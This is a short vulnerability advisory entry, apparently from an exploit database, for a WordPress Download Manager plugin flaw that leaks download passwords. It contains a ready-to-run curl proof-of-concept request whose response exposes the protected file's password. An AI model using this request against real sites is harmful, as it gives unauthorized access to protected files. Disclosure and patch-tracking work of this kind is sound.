Lucene search

K
wpexploitLiu ShaohongWPEX-ID:244C7C00-FC8D-4A73-BBE0-7865C621D410
HistoryDec 09, 2023 - 12:00 a.m.

Download Manager < 3.2.83 - Unauthenticated Protected File Download Password Leak

2023-12-0900:00:00
Liu Shaohong
167
download manager
unauthenticated
file download
password leak
exploit

AI Score

6.8

Confidence

Low

EPSS

0.001

Percentile

36.0%

Description The plugin does not protect file download’s passwords, leaking it upon receiving an invalid one.

223 being the ID of a password protected download:

curl -X POST --data '__wpdm_ID=223&dataType=json&execute=wpdm_getlink&action=wpdm_ajax_call&password=123322' https://example.com/wp-json/wpdm/validate-password

 The response will contain the password in the 'op' field

AI Score

6.8

Confidence

Low

EPSS

0.001

Percentile

36.0%

Related for WPEX-ID:244C7C00-FC8D-4A73-BBE0-7865C621D410